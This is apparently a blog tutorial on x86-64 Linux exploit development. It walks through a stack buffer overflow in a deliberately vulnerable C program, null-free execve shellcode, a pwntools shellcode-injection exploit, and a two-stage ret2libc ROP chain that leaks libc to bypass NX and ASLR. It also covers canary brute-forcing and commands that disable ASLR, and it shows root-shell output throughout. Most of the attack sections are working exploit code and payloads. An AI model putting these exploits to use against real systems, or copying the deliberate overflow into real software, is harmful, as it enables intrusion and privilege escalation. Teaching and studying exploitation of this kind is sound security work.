In today’s post we’re going to walk through exploit development on x86-64 Linux from the ground up. We’ll start with a basic stack overflow, write shellcode, pop a shell, then watch every mitigation kill our exploit one by one. Then we bypass them.
The old-school 32-bit stuff still gets taught everywhere, but the reality is almost nobody’s running 32-bit anymore. The calling conventions are different, the syscall interface is different, the mitigations are different. Is this the most advanced exploitation technique out there? No. But if you don’t understand what’s happening at this level, you’re not going to understand anything that comes after it. This is the foundation everything else builds on.
Before we break anything, we need to know what we’re breaking. A process on Linux has its virtual memory laid out roughly like this:
high addresses
+------------------+
| stack | <- grows DOWN (toward lower addresses)
| | |
| v |
| |
| ^ |
| | |
| heap | <- grows UP (malloc, ...)
+------------------+
| .bss | <- uninitialized globals
+------------------+
| .data | <- initialized globals
+------------------+
| .text | <- your code (instructions)
+------------------+
low addresses
The stack is where function calls live. Every time you call a function, a new stack frame gets pushed. That frame contains the function’s local variables, the saved base pointer (RBP) so the caller’s frame can be restored, and the return address, where execution continues after the function returns.
On x86-64, the key registers:
| Register | Purpose |
|---|---|
| RIP | Instruction pointer; address of the next instruction to execute |
| RSP | Stack pointer; points to the top of the stack |
| RBP | Base pointer; points to the base of the current stack frame |
| RAX | Return value; also used for syscall number |
| RDI, RSI, RDX, RCX, R8… | Function arguments, in order (syscalls use R10 in place of RCX) |
This is the System V AMD64 ABI calling convention. Function arguments go in registers, not on the stack like 32-bit x86. This matters a lot for exploit dev because it means we can’t just throw arguments on the stack and hope the function picks them up. We need to load registers explicitly, which is where ROP gadgets come in later.
When vuln() gets called, the stack frame looks like:
low addresses
+------------------+
RSP --> | buf[64] | <- local buffer (64 bytes)
+------------------+
| saved RBP | <- 8 bytes (64-bit)
+------------------+
| return address | <- 8 bytes. THIS is our target
+------------------+
| caller's frame |
+------------------+
high addresses
If we write more than 64 bytes into buf, we overflow into the saved RBP (8 bytes), and then into the return address. Control that return address, control execution. That’s the whole game.
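The arithmetic is worth pinning down. Here’s a quick sketch in Python, assuming the compiler lays `buf` out flush against the saved RBP with no padding in between (a real compiler may add alignment padding, which is why the offset gets confirmed empirically):

```python
BUF_SIZE = 64       # char buf[64]
SAVED_RBP = 8       # 64-bit saved base pointer
RET_OFFSET = BUF_SIZE + SAVED_RBP   # byte offset of the return address

# a payload that overwrites the return address with an attacker-chosen value
target = 0x4141414141414141
payload = b"A" * RET_OFFSET + target.to_bytes(8, "little")

assert RET_OFFSET == 72
assert len(payload) == 80   # 64 (buf) + 8 (saved RBP) + 8 (return address)
```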
#include <stdio.h>
#include <unistd.h>
void vuln() {
char buf[64];
printf("buf @ %p\n", buf);
read(0, buf, 256); // reads up to 256 bytes into a 64-byte buffer
}
int main() {
vuln();
printf("returned normally\n");
return 0;
}
read() will happily write 256 bytes into a 64-byte buffer. Classic overflow. The compiler will warn you about it, the linker will warn you about it, and we’re gonna ignore all of it.
Compile with all protections off:
$ gcc -o vuln vuln.c -fno-stack-protector -z execstack -no-pie -g
What those flags do:
| flag | what it does |
|---|---|
| `-fno-stack-protector` | disables stack canaries |
| `-z execstack` | disables NX (makes the stack executable) |
| `-no-pie` | disables PIE, so the binary loads at a fixed address |
| `-g` | adds debug symbols |
Also disable system-wide ASLR:
# echo 0 > /proc/sys/kernel/randomize_va_space
Normal run:
$ echo "AAAA" | ./vuln
buf @ 0x7ffffffc3b20
returned normally
Overflow:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*80)" | ./vuln
Segmentation fault
Dead. We wrote past the buffer, trashed the return address, and the process tried to jump to 0x4141414141414141. That’s not a valid address, so it crashed. But what if we put a real address there? The buffer is 64 bytes. Saved RBP is 8 bytes. So the return address starts at offset 72 from the start of the buffer.
We can confirm this with pwntools. The idea is simple: try different offsets, overwrite the return address with the address of main(), and see which offset makes the program loop back instead of crashing:
from pwn import *
context.arch = "amd64"
elf = ELF("./vuln", checksec=False)
for off in range(64, 96, 8):
    p = process("./vuln")
    p.recvuntil(b"buf @ ")
    p.recvline()
    payload = b"A" * off + p64(elf.symbols["main"])
    p.sendline(payload)
    try:
        resp = p.recv(timeout=2)
        if b"buf @" in resp:
            print(f"offset {off}: HIT - redirected to main()")
            p.close()
            break
    except EOFError:
        print(f"offset {off}: crash")
    p.close()
offset 64: crash
offset 72: HIT - redirected to main()
Offset 72. We overwrote the return address with the address of main(), and the program looped back instead of dying. That’s RIP control.
Writing x86-64 Shellcode
This is where 32-bit and 64-bit diverge hard. On 32-bit x86, you’d use int 0x80 with syscall numbers in EAX and args in EBX/ECX/EDX. On x86-64, everything changes:
| | 32-bit (x86) | 64-bit (x86-64) |
|---|---|---|
| syscall instruction | `int 0x80` | `syscall` |
| syscall number | EAX | RAX |
| arg 1 | EBX | RDI |
| arg 2 | ECX | RSI |
| arg 3 | EDX | RDX |
| execve number | 11 | 59 (0x3b) |
If you try to use 32-bit syscall conventions on a 64-bit system, it’ll technically work (the kernel still supports int 0x80 for backwards compat) but you’ll be operating in 32-bit compatibility mode with truncated addresses. Don’t do it. Use syscall.
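You can poke at the 64-bit syscall interface without writing any assembly. A small sketch using libc’s syscall() wrapper through ctypes; this assumes an x86-64 Linux host, where getpid is syscall 39:

```python
import ctypes
import os

# libc's syscall() wrapper does exactly what the table describes:
# number in RAX, arguments in RDI/RSI/RDX/..., then the syscall instruction
libc = ctypes.CDLL(None)

SYS_getpid = 39   # x86-64 number; the 32-bit x86 number is 20
pid = libc.syscall(SYS_getpid)

assert pid == os.getpid()   # same answer as the libc getpid() wrapper
```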
We want execve("/bin/sh", NULL, NULL). In assembly:
; x86-64 execve("/bin/sh", NULL, NULL) - null-free shellcode
; 28 bytes
section .text
global _start
_start:
xor rdx, rdx ; rdx = 0 (envp = NULL)
xor rsi, rsi ; rsi = 0 (argv = NULL)
push rsi ; push null terminator onto stack
mov rdi, 0x68732f2f6e69622f ; "/bin//sh" in little-endian
push rdi ; push string onto stack
mov rdi, rsp ; rdi = pointer to "/bin//sh\0"
xor rax, rax
mov al, 0x3b ; syscall 59 = execve
syscall
Let’s break down the tricks:

- `xor reg, reg` zeros a register without producing null bytes. `mov rax, 0` would assemble to `48 c7 c0 00 00 00 00`, seven bytes with four nulls. `xor rax, rax` is `48 31 c0`, three bytes, zero nulls.
- We use `"/bin//sh"` instead of `"/bin/sh"` because it’s exactly 8 bytes and fits in a single 64-bit register. The kernel ignores the double slash; `/bin//sh` resolves the same as `/bin/sh`.
- `mov al, 0x3b` instead of `mov rax, 59` because we already zeroed RAX with `xor`, so we only need to set the low byte. Avoids nulls.
- The string goes on the stack via `push`. No data segment needed; the shellcode is fully self-contained.
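The `"/bin//sh"` trick is easy to verify from Python: packing the string little-endian yields exactly the immediate in the `mov rdi` above.

```python
from struct import pack, unpack

# "/bin//sh" is exactly 8 bytes, so it fits one 64-bit immediate
val, = unpack("<Q", b"/bin//sh")
assert val == 0x68732f2f6e69622f   # the constant in `mov rdi, ...`

# the naive "/bin/sh\0" also fills 8 bytes, but drags in a null byte
padded, = unpack("<Q", b"/bin/sh\x00")
assert b"\x00" in pack("<Q", padded)
assert b"\x00" not in pack("<Q", val)   # the double-slash version stays clean
```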
Assemble and extract:
$ nasm -f elf64 shell.asm -o shell.o
$ ld -o shell shell.o
$ objcopy -O binary -j .text shell shell.bin
$ xxd shell.bin
00000000: 4831 d248 31f6 5648 bf2f 6269 6e2f 2f73 H1.H1.VH./bin//s
00000010: 6857 4889 e748 31c0 b03b 0f05 hWH..H1..;..
28 bytes. Null-free. Let’s verify it actually works:
$ ./shell
$ id
uid=0(root) gid=0(root) groups=0(root)
The shellcode as a byte string:
\x48\x31\xd2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73
\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05
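A quick sanity check on those bytes, confirming the two properties we care about before dropping them into an exploit script:

```python
shellcode = (
    b"\x48\x31\xd2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73"
    b"\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05"
)

assert len(shellcode) == 28          # matches the xxd dump
assert b"\x00" not in shellcode      # null-free: survives string-copy delivery
assert b"/bin//sh" in shellcode      # the embedded path, visible in the bytes
```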
Now we put it together. We place the shellcode at the start of the buffer, pad to 72 bytes, then overwrite the return address with the address of buf itself. When the function returns, RIP jumps to our buffer and executes the shellcode.
"""
[shellcode (28 bytes)] [NOP padding (44 bytes)] [return addr -> buf (8 bytes)]
^ |
|_______________________________________________|
"""
from pwn import *
context.arch = "amd64"
shellcode = (
    b"\x48\x31\xd2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73"
    b"\x68\x57\x48\x89\xe7\x48\x31\xc0\xb0\x3b\x0f\x05"
)
OFFSET = 72
p = process("./vuln")
p.recvuntil(b"buf @ ")
buf_addr = int(p.recvline().strip(), 16)
payload = shellcode # 28 bytes
payload += b"\x90" * (OFFSET - len(shellcode)) # 44 bytes NOP padding
payload += p64(buf_addr) # 8 bytes -> jump to buf
log.info(f"buf @ {hex(buf_addr)}")
p.sendline(payload)
p.interactive()
Root shell. The program was supposed to read some input and return. Instead it’s running /bin/sh with whatever privileges the binary has.
[*] buf @ 0x7ffffffc3ab0
[*] payload: 28b sc + 44b nops + 8b ret -> 0x7ffffffc3ab0
[+] got shell:
uid=0(root) gid=0(root) groups=0(root)
This is the baseline. This is how it worked in the early 2000s. Now let’s see why it won’t cut it anymore. Compile the same program with modern defaults and our exploit dies in multiple ways. Let’s go through them one at a time.
NX (No-eXecute)
$ gcc -o vuln_nx vuln.c -fno-stack-protector -no-pie
NX marks the stack as non-executable. Our shellcode lands on the stack, the CPU tries to execute it, and the hardware says no. Process killed. This is enforced at the hardware level via the NX bit in the page table entries. You can’t software your way around it.
buf @ 0x7ffffffc39d0
process killed
The shellcode is there in memory, sitting right where we put it. But the page permissions won’t let it run.
Stack Canaries
$ gcc -o vuln_canary vuln.c -fstack-protector-all -z execstack -no-pie
The compiler inserts a random value (the “canary”) between the local variables and the saved RBP/return address. Before the function returns, it checks if the canary was modified. If it was, the overflow is detected and the process aborts.
The stack frame now looks like:
+------------------+
| buf[64] |
+------------------+
| canary (8b) | <- random value, checked before return
+------------------+
| saved RBP |
+------------------+
| return address |
+------------------+
To overflow into the return address, you have to overwrite the canary. The check catches it. Game over. Unless you can leak the canary value first, but that’s a different conversation.
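That “different conversation” deserves one aside: the canary is generated once per process, and fork() copies it, so a forking server hands you a brute-force oracle. Below is a toy simulation of the byte-at-a-time technique; there’s no real process here, just the search logic (glibc keeps a null terminator byte in the canary’s low byte):

```python
import os

# simulated forking service: the canary is generated once at startup
# and every forked child inherits the SAME value
CANARY = b"\x00" + os.urandom(7)   # glibc zeroes the low byte

def child_survives(guess: bytes) -> bool:
    # stand-in for one forked child: it aborts (__stack_chk_fail)
    # unless the overflowed bytes match the real canary prefix exactly
    return CANARY.startswith(guess)

# guess one byte at a time: at most 8 * 256 probes instead of 2^64
recovered = b""
for _ in range(8):
    for candidate in range(256):
        if child_survives(recovered + bytes([candidate])):
            recovered += bytes([candidate])
            break

assert recovered == CANARY
```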
ASLR (Address Space Layout Randomization)
# echo 2 > /proc/sys/kernel/randomize_va_space
ASLR randomizes the base addresses of the stack, heap, and shared libraries every time the program runs. Our hardcoded return address is now wrong:
run 1: buf @ 0x7ffffffc3aa0
run 2: buf @ 0x7ffffffc3bb0
run 3: buf @ 0x7ffffffc39d0
run 4: buf @ 0x7ffffffc3ad0
run 5: buf @ 0x7ffffffc3a00
-> address changes every run. hardcoded ret addr = crash
PIE (Position Independent Executable)
PIE randomizes the base address of the binary itself. Now even the addresses of functions in the binary (main, vuln, PLT entries) change every run. Combined with ASLR, nothing has a fixed address.
Full RELRO
Full RELRO makes the Global Offset Table (GOT) read-only after the dynamic linker resolves all symbols. This prevents GOT overwrite attacks, where you’d replace a function pointer in the GOT to redirect execution.
What the Defaults Look Like
Compile with zero flags on Ubuntu 22.04:
$ gcc -o vuln vuln.c
$ checksec vuln
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Everything is on by default. SHSTK (Shadow Stack) and IBT (Indirect Branch Tracking) are Intel CET features, hardware-level control flow integrity. Shadow stack keeps a separate copy of return addresses that the attacker can’t touch. IBT requires indirect jumps to land on endbr64 instructions, which limits where you can redirect execution.
Our classical exploit is dead six different ways. Time to evolve.
Bypassing NX with ret2libc
If we can’t execute code on the stack, we use code that already exists in memory. libc is loaded into every dynamically linked process and contains system(), which executes shell commands. If we can call system("/bin/sh"), we get a shell without any shellcode on the stack.
The problem is that on x86-64, function arguments go in registers, not on the stack. We can’t just place "/bin/sh" on the stack and hope system() picks it up. We need to load the address of "/bin/sh" into RDI before calling system().
This is where ROP gadgets come in. A gadget is a short sequence of instructions ending in ret that we can chain together by placing addresses on the stack. Each ret pops the next address off the stack and jumps to it, creating a chain of execution. The gadget we need:
/* pop rdi ; ret ; pops the next value from the stack into RDI, then returns */
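Before wiring this into a real target, here’s what a minimal chain looks like as raw bytes, built with plain struct packing. The addresses are made up for illustration; a real chain uses addresses pulled from the target binary and libc:

```python
from struct import pack

# hypothetical addresses, for illustration only
POP_RDI = 0x40118d          # pop rdi ; ret
BINSH   = 0x7ffff7f5a668    # "/bin/sh" somewhere in libc
SYSTEM  = 0x7ffff7dcbd70    # system() in libc

OFFSET = 72                 # buf + saved RBP, same as before

chain  = b"A" * OFFSET        # filler up to the return address
chain += pack("<Q", POP_RDI)  # ret pops this into RIP -> gadget runs
chain += pack("<Q", BINSH)    # the gadget's `pop rdi` eats this qword
chain += pack("<Q", SYSTEM)   # the gadget's `ret` pops this -> system()

assert len(chain) == OFFSET + 3 * 8
assert chain[OFFSET:OFFSET + 8] == pack("<Q", POP_RDI)
```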
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void setup() {
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
}
// provides ROP gadgets in the binary
void __attribute__((used)) gadgets() {
asm volatile(
"pop %rdi; ret\n"
"pop %rsi; pop %r15; ret\n"
);
}
void vuln() {
char buf[64];
puts("give me input:");
read(0, buf, 256);
}
int main() {
setup();
vuln();
return 0;
}
A note on the gadgets() function: modern toolchains no longer give you these for free. Older binaries shipped __libc_csu_init, which provided pop rdi; ret and friends in basically every ELF; glibc 2.34 dropped it. In real-world exploitation you’d find gadgets in libc or other loaded libraries using ROPgadget or ropper. Here we embed them for clarity.
Compile with NX on, no canary, no PIE:
$ gcc -o vuln2 vuln2.c -fno-stack-protector -no-pie -fcf-protection=none
$ checksec vuln2
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Find our gadgets:
$ ROPgadget --binary vuln2 | grep "pop rdi"
0x000000000040118d : pop rdi ; ret
The Two-Stage Exploit
This exploit works in two stages. Why two? Because we need to know where libc is loaded in memory, and we don’t know that until runtime.
Stage 1: call puts(puts@GOT). The GOT entry for puts holds its runtime address in libc. By printing it, we learn where libc is loaded. Then we return to main() so we get a second round of input.

Stage 2: call system("/bin/sh"). Now that we know libc’s base address, we calculate the addresses of system() and the "/bin/sh" string inside libc, and build a ROP chain that calls system("/bin/sh").
The stack layouts:
stage 1: stage 2:
+------------------+ +------------------+
| "A" * 72 | | "A" * 72 |
+------------------+ +------------------+
| pop rdi; ret | | ret | <- stack alignment
+------------------+ +------------------+
| puts@GOT | | pop rdi; ret |
+------------------+ +------------------+
| puts@PLT | | "/bin/sh" addr |
+------------------+ +------------------+
| main | | system() |
+------------------+ +------------------+
That ret gadget before pop rdi in stage 2 is for stack alignment. The System V ABI requires the stack to be 16-byte aligned before a call instruction. Without it, system() will segfault on a movaps instruction inside libc. This trips up a lot of people. If your ROP chain segfaults for no obvious reason, try adding a ret gadget before the function call.
The Exploit
from pwn import *
context.arch = "amd64"
elf = ELF("./vuln2", checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
OFFSET = 72
POP_RDI = 0x40118d
RET = POP_RDI + 1 # 0x40118e
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main = elf.symbols["main"]
# leak libc
p = process("./vuln2")
p.recvuntil(b"give me input:\n")
payload = b"A" * OFFSET
payload += p64(POP_RDI) # pop rdi; ret
payload += p64(puts_got) # rdi = puts@GOT (runtime addr of puts)
payload += p64(puts_plt) # call puts() to print it
payload += p64(main) # return to main for stage 2
p.send(payload)
leaked = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leaked - libc.symbols["puts"]
system = libc.symbols["system"]
binsh = next(libc.search(b"/bin/sh"))
log.info(f"leaked puts @ {hex(leaked)}")
log.info(f"libc base @ {hex(libc.address)}")
log.info(f"system() @ {hex(system)}")
log.info(f"/bin/sh @ {hex(binsh)}")
# system("/bin/sh")
p.recvuntil(b"give me input:\n")
payload2 = b"A" * OFFSET
payload2 += p64(RET) # stack alignment
payload2 += p64(POP_RDI) # pop rdi; ret
payload2 += p64(binsh) # rdi = "/bin/sh"
payload2 += p64(system) # call system()
p.send(payload2)
p.interactive()
[*] leaked puts @ 0x7fffff615e50
[*] libc base @ 0x7fffff595000
[*] system() @ 0x7fffff5e5d70
[*] /bin/sh @ 0x7fffff76d678
[+] shell popped:
uid=0(root) gid=0(root) groups=0(root)
No shellcode on the stack. No executable stack needed. We used code that was already in memory. NX is completely irrelevant to this technique.
Bypassing ASLR + NX
Here’s the thing: the same exploit works with ASLR on. The binary itself is not PIE (fixed at 0x400000), so our gadget addresses and PLT/GOT addresses don’t change. Only libc moves around, and we leak its address at runtime. That’s the whole point of the two-stage approach.
# echo 2 > /proc/sys/kernel/randomize_va_space
[*] ret2libc with ASLR ON
[*] binary is no-PIE so code addrs are fixed
[*] but libc is randomized - we leak it at runtime
[*] leaked puts @ 0x7fffff615e50
[*] libc base @ 0x7fffff595000
[*] system() @ 0x7fffff5e5d70
[*] /bin/sh @ 0x7fffff76d678
[+] ASLR bypassed. shell popped:
uid=0(root) gid=0(root) groups=0(root)
ASLR randomizes where things are loaded, but it doesn’t prevent you from reading those addresses at runtime. If you can leak a single libc address, you can calculate every other address in libc, because the offsets between functions are fixed within a given libc build. One leak and the whole thing unravels.
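The arithmetic from the run above makes that concrete. The offsets below are the ones implied by the logged addresses; in the exploit script, pwntools reads them from the ELF as libc.symbols["puts"] and libc.symbols["system"]:

```python
# runtime leak from stage 1 (value taken from the log above)
leaked_puts = 0x7fffff615e50

# per-build constants: each symbol's fixed offset from libc's base
PUTS_OFFSET   = 0x80e50
SYSTEM_OFFSET = 0x50d70

libc_base   = leaked_puts - PUTS_OFFSET    # one leak pins the whole library
system_addr = libc_base + SYSTEM_OFFSET

assert libc_base   == 0x7fffff595000   # matches the logged libc base
assert system_addr == 0x7fffff5e5d70   # matches the logged system()
```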
As of today, the exploit landscape has gotten significantly harder:
| mitigation | what it does | bypass |
|---|---|---|
| NX | non-executable stack | ret2libc, ROP |
| stack canaries | detect overflow before return | info leak to read canary, or don’t overflow past it |
| ASLR | randomize stack/heap/libc addresses | info leak (format string, partial overwrite, side channel) |
| PIE | randomize binary base address | info leak for binary addresses too |
| Full RELRO | GOT is read-only | can’t overwrite GOT entries, use other write targets |
| CET (SHSTK) | shadow stack for return addresses | still being researched, FineIBT bypass |
| CET (IBT) | indirect branches must land on endbr64 | limits gadget availability but doesn’t eliminate ROP |
The pattern is that every mitigation makes exploitation harder but not impossible. The game has shifted from “inject and execute shellcode” to “chain together existing code fragments using leaked runtime information.” In practice, that means:
- Find a bug (overflow, use-after-free, type confusion)
- Turn it into an info leak (defeat ASLR/PIE/canary)
- Build a ROP chain or corrupt a function pointer (defeat NX)
- Deal with RELRO, CFI, CET as needed
The bar is higher. The bugs are rarer. But the fundamental principle hasn’t changed: if you control what gets written where, you control execution.